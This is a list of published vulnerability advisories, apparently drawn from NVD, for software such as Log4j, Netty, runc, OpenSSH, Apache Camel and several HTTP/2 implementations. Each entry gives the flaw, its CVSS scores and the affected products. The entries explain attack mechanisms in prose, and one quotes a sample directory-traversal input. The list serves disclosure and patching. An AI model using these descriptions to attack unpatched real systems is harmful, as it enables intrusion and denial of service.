CVE-2019-17571 HIGH

Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data, which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget while listening to untrusted network traffic for log data. This affects Log4j 1.2 versions up to 1.2.17.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
opensuse leap 15.1
oracle weblogic_server 10.3.6.0.0
debian debian_linux 10.0
apache log4j *
oracle primavera_gateway *
oracle retail_service_backbone 15.0
oracle rapid_planning 12.1
oracle mysql_enterprise_monitor *
netapp oncommand_system_manager *
oracle communications_network_integrity *
oracle weblogic_server 12.2.1.4.0
oracle weblogic_server 12.2.1.3.0
oracle financial_services_lending_and_leasing *
oracle financial_services_lending_and_leasing 12.5.0
debian debian_linux 9.0
debian debian_linux 8.0
oracle application_testing_suite 13.3.0.1
oracle retail_service_backbone 14.1
oracle retail_extract_transform_and_load 19.0
apache bookkeeper *
oracle weblogic_server 14.1.1.0.0
oracle endeca_information_discovery_studio 3.2.0
oracle retail_service_backbone 16.0
netapp oncommand_workflow_automation -
oracle rapid_planning 12.2
oracle weblogic_server 12.1.3.0.0
CVE-2019-17572 MEDIUM

In Apache RocketMQ 4.2.0 to 4.6.0, when automatic topic creation in the broker is turned on (the default), a malicious topic name such as “../../../../topic2020” sent from rocketmq-client to the broker causes a topic folder to be created in the parent directory on the broker, which leads to a directory traversal vulnerability. Users of the affected versions should apply one of the following: Upgrade to Apache RocketMQ 4.6.1 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache rocketmq *
CVE-2019-17573 MEDIUM

By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack, which allows a malicious actor to inject JavaScript into the web page. Please note that the attack exploits a feature which is not typically present in modern browsers, which remove dot segments before sending the request. However, mobile applications may be vulnerable.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
oracle communications_session_route_manager 8.1.1
oracle commerce_guided_search 11.3.2
oracle communications_session_report_manager 8.1.1
oracle communications_element_manager 8.2.0
oracle communications_session_report_manager 8.2.1
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
oracle communications_element_manager 8.2.1
apache cxf *
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle retail_order_broker 15.0
CVE-2019-19603 MEDIUM

SQLite 3.30.1 mishandles certain SELECT statements with a nonexistent VIEW, leading to an application crash.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp cloud_backup -
siemens sinec_infrastructure_network_services *
sqlite sqlite 3.30.1
oracle mysql_workbench *
netapp ontap_select_deploy_administration_utility -
siemens sinec_infrastructure_network_services 1.0.1.1
apache guacamole 1.3.0
CVE-2019-19906 MEDIUM

cyrus-sasl (aka Cyrus SASL) 2.1.27 has an out-of-bounds write leading to unauthenticated remote denial-of-service in OpenLDAP via a malformed LDAP packet. The OpenLDAP crash is ultimately caused by an off-by-one error in _sasl_add_string in common.c in cyrus-sasl.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-193,CWE-787,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
redhat enterprise_linux_for_power_little_endian_eus 8.4
redhat enterprise_linux_server_update_services_for_sap_solutions 8.4
debian debian_linux 10.0
apple mac_os_x 10.13.6
redhat enterprise_linux 6.0
fedoraproject fedora 32
canonical ubuntu_linux 12.04
redhat enterprise_linux_server_tus 8.4
canonical ubuntu_linux 14.04
cyrusimap cyrus-sasl *
redhat enterprise_linux_for_ibm_z_systems 8.0
apache bookkeeper 4.12.1
redhat enterprise_linux_for_ibm_z_systems_eus 8.4
apple ipados 13.6
apple mac_os_x *
redhat enterprise_linux_for_power_little_endian 8.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
apple mac_os_x 10.14.6
redhat enterprise_linux_eus 8.4
debian debian_linux 8.0
redhat enterprise_linux 7.0
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.4
canonical ubuntu_linux 16.04
fedoraproject fedora 31
redhat enterprise_linux 5.0
redhat enterprise_linux_server_aus 8.4
redhat jboss_enterprise_web_server 2.0.0
apple iphone_os 13.6
canonical ubuntu_linux 19.10
CVE-2019-19924 MEDIUM

SQLite 3.30.1 mishandles certain parser-tree rewriting, related to expr.c, vdbeaux.c, and window.c. This is caused by incorrect sqlite3WindowRewrite() error handling.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
apache bookkeeper 4.12.1
netapp cloud_backup -
siemens sinec_infrastructure_network_services *
sqlite sqlite 3.30.1
oracle mysql_workbench *
CVE-2019-20445 MEDIUM

HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
redhat jboss_amq_clients 2
apache spark 2.4.8
debian debian_linux 9.0
apache spark 2.4.7
debian debian_linux 10.0
netty netty *
redhat jboss_enterprise_application_platform 7.2
redhat jboss_enterprise_application_platform 7.3
debian debian_linux 8.0
fedoraproject fedora 33
CVE-2019-2684 MEDIUM

Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
redhat enterprise_linux_eus 8.2
apache cassandra *
apache tomcat *
redhat enterprise_linux_server_tus 8.4
oracle jre 1.8.0
oracle jre 12
redhat enterprise_linux_server 6.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 8.6
redhat enterprise_linux_workstation 7.0
redhat satellite 5.8
oracle jre 1.7.0
redhat enterprise_linux_server_aus 8.6
opensuse leap 15.0
debian debian_linux 9.0
oracle jdk 1.8.0
opensuse leap 42.3
redhat enterprise_linux 8.0
oracle jre 11.0.2
hp xp7_command_view *
redhat enterprise_linux_eus 8.4
redhat enterprise_linux_eus 8.6
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_eus 8.1
apache cassandra 4.0.0
debian debian_linux 8.0
oracle jdk 1.7.0
canonical ubuntu_linux 16.04
oracle jdk 12
apache tomcat 9.0.0
redhat enterprise_linux_server_aus 8.4
oracle jdk 11.0.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
redhat openshift_container_platform 3.11
redhat enterprise_linux_server 7.0
CVE-2019-5736 HIGH

runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.6 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 1.8 6.0

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
canonical ubuntu_linux 18.10
redhat openshift 3.7
microfocus service_management_automation 2018.02
canonical ubuntu_linux 18.04
opensuse leap 15.1
apache mesos *
linuxfoundation runc *
d2iq kubernetes_engine *
docker docker *
linuxfoundation runc 1.0.0
microfocus service_management_automation 2018.08
hp onesphere -
netapp solidfire -
netapp hci_management_node -
fedoraproject fedora 29
microfocus service_management_automation 2018.05
redhat openshift 3.6
opensuse leap 15.0
opensuse leap 42.3
redhat enterprise_linux 8.0
opensuse backports_sle 15.0
redhat container_development_kit 3.7
microfocus service_management_automation 2018.11
linuxcontainers lxc *
redhat openshift 3.4
redhat openshift 3.5
canonical ubuntu_linux 16.04
fedoraproject fedora 30
google kubernetes_engine -
d2iq dc/os *
redhat enterprise_linux_server 7.0
CVE-2019-6111 MEDIUM

An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
redhat enterprise_linux_eus 8.2
fujitsu m10-1_firmware *
openbsd openssh *
fujitsu m10-4s_firmware *
redhat enterprise_linux_server_tus 8.4
freebsd freebsd 12.0
freebsd freebsd *
canonical ubuntu_linux 14.04
redhat enterprise_linux_server_tus 8.6
fujitsu m12-2_firmware *
redhat enterprise_linux_server_aus 8.6
fujitsu m12-1_firmware *
apache mina_sshd 2.2.0
debian debian_linux 9.0
fujitsu m12-2s_firmware *
redhat enterprise_linux 8.0
fujitsu m10-4_firmware *
redhat enterprise_linux_eus 8.4
siemens scalance_x204rna_firmware *
redhat enterprise_linux_eus 8.6
redhat enterprise_linux_eus 8.1
debian debian_linux 8.0
redhat enterprise_linux 7.0
canonical ubuntu_linux 16.04
fedoraproject fedora 30
winscp winscp *
redhat enterprise_linux_server_aus 8.4
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
siemens scalance_x204rna_eec_firmware *
CVE-2019-9511 HIGH

Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
f5 nginx *
apple swiftnio *
redhat openshift_service_mesh 1.0
oracle enterprise_communications_broker 3.1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
oracle enterprise_communications_broker 3.2.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9512 HIGH

Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apple swiftnio *
nodejs node.js *
debian debian_linux 10.0
apache traffic_server *
CVE-2019-9513 HIGH

Some HTTP/2 implementations are vulnerable to resource loops, potentially leading to a denial of service. The attacker creates multiple request streams and continually shuffles the priority of the streams in a way that causes substantial churn to the priority tree. This can consume excess CPU.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,NVD-CWE-Other,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
f5 nginx *
apple swiftnio *
redhat openshift_service_mesh 1.0
oracle enterprise_communications_broker 3.1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
oracle enterprise_communications_broker 3.2.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9514 HIGH

Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
redhat openshift_container_platform 3.10
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
apple swiftnio *
netapp trident -
f5 big-ip_local_traffic_manager *
redhat openshift_service_mesh 1.0
redhat developer_tools 1.0
fedoraproject fedora 29
redhat enterprise_linux_workstation 7.0
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
redhat single_sign-on 7.3
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
redhat openshift_container_platform 4.1
synology skynas -
redhat openshift_container_platform 3.9
redhat enterprise_linux_eus 8.1
redhat jboss_enterprise_application_platform 7.3.0
redhat openstack 14
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
netapp cloud_insights -
redhat software_collections 1.0
redhat openshift_container_platform 3.11
redhat enterprise_linux_server 7.0
redhat openshift_container_platform 4.2
CVE-2019-9515 HIGH

Some HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a denial of service. The attacker sends a stream of SETTINGS frames to the peer. Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
apple swiftnio *
f5 big-ip_local_traffic_manager *
redhat openshift_service_mesh 1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
redhat single_sign-on 7.3
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
redhat openshift_container_platform 4.1
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
redhat openstack 14
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9516 MEDIUM

Some HTTP/2 implementations are vulnerable to a header leak, potentially leading to a denial of service. The attacker sends a stream of headers with a 0-length header name and 0-length header value, optionally Huffman encoded into 1-byte or greater headers. Some implementations allocate memory for these headers and keep the allocation alive until the session dies. This can consume excess memory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
f5 nginx *
apple swiftnio *
fedoraproject fedora 32
redhat openshift_service_mesh 1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9517 HIGH

Some HTTP/2 implementations are vulnerable to unconstrained internal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint; however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
apache http_server *
oracle instantis_enterprisetrack *
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
netapp clustered_data_ontap -
apple swiftnio *
oracle communications_element_manager 8.0.0
oracle communications_element_manager 8.1.1
oracle retail_xstore_point_of_service 7.1
redhat openshift_service_mesh 1.0
oracle communications_element_manager 8.1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
oracle communications_element_manager 8.2.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9518 HIGH

Some HTTP/2 implementations are vulnerable to a flood of empty frames, potentially leading to a denial of service. The attacker sends a stream of frames with an empty payload and without the end-of-stream flag. These frames can be DATA, HEADERS, CONTINUATION and/or PUSH_PROMISE. The peer spends time processing each frame disproportionate to attack bandwidth. This can consume excess CPU.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
apple swiftnio *
redhat openshift_service_mesh 1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2020-10727 LOW

A flaw was found in ActiveMQ Artemis management API from version 2.7.0 up until 2.12.0, where a user inadvertently stores passwords in plaintext in the Artemis shadow file (etc/artemis-users.properties file) when executing the `resetUsers` operation. A local attacker can use this flaw to read the contents of the Artemis shadow file.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-312,CWE-522,

Products Affected

Vendor Product Version
apache activemq_artemis *
netapp oncommand_workflow_automation -
CVE-2020-11969 MEDIUM

If Apache TomEE is configured to use the embedded ActiveMQ broker, and the broker URI includes the useJMX=true parameter, a JMX port is opened on TCP port 1099, which does not include authentication. This affects Apache TomEE 8.0.0-M1 - 8.0.1, Apache TomEE 7.1.0 - 7.1.2, Apache TomEE 7.0.0-M1 - 7.0.7, Apache TomEE 1.0.0 - 1.7.5.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache tomee *
apache tomee 7.0.0
apache tomee 8.0.0
CVE-2020-11971 MEDIUM

Apache Camel's JMX is vulnerable to a rebind flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, and 3.0.0 up to 3.1.0 are affected. Users should upgrade to 3.2.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle enterprise_manager_base_platform 13.4.0.0
apache camel *
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_intelligence_hub *
oracle communications_diameter_signaling_router *
oracle flexcube_private_banking 12.1.0
oracle enterprise_manager_base_platform 13.3.0.0
CVE-2020-11972 HIGH

Apache Camel RabbitMQ enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle enterprise_manager_base_platform 13.4.0.0
apache camel *
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
oracle flexcube_private_banking 12.1.0
oracle enterprise_manager_base_platform 13.3.0.0
CVE-2020-11973 HIGH

Apache Camel Netty enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle enterprise_manager_base_platform 13.4.0.0
apache camel *
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
oracle flexcube_private_banking 12.1.0
oracle enterprise_manager_base_platform 13.3.0.0
CVE-2020-11974 HIGH

In DolphinScheduler 1.2.0 and 1.2.1, when mysql is chosen as the database, a remote code execution vulnerability exists via mysql connectorj.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache dolphinscheduler 1.2.0
apache dolphinscheduler 1.2.1
CVE-2020-11975 HIGH

Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache unomi *
CVE-2020-11976 MEDIUM

By crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates. This would allow an attacker to see possibly sensitive information inside an HTML template that is usually removed during rendering. Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-552,

Products Affected

Vendor Product Version
apache fortress 2.0.5
apache wicket *
apache wicket 9.0.0
CVE-2020-11977 HIGH

In Apache Syncope 2.1.X releases prior to 2.1.7, when the Flowable extension is enabled, an administrator with workflow entitlements can use Shell Service Tasks to perform malicious operations, including but not limited to file read, file write, and code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache syncope *
CVE-2020-11978 MEDIUM

An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-11979 MEDIUM

As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without said protection, effectively nullifying the effort. This would still allow an attacker to inject modified source files into the build process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-379,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle api_gateway 11.1.2.4.0
oracle banking_platform 2.4.1
oracle real-time_decision_server 3.2.0.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_eftlink 19.0.1
oracle communications_unified_inventory_management 7.4.0
oracle endeca_information_discovery_studio 3.2.0.0
oracle retail_item_planning 16.0.3
oracle retail_service_backbone 15.0.3
oracle utilities_framework 4.4.0.0.0
oracle data_integrator 12.2.1.4.0
oracle primavera_gateway *
oracle retail_merchandising_system 16.0.3
oracle utilities_framework 4.3.0.5.0
oracle primavera_unifier *
oracle retail_xstore_point_of_service 18.0.3
oracle financial_services_analytical_applications_infrastructure 8.1.0
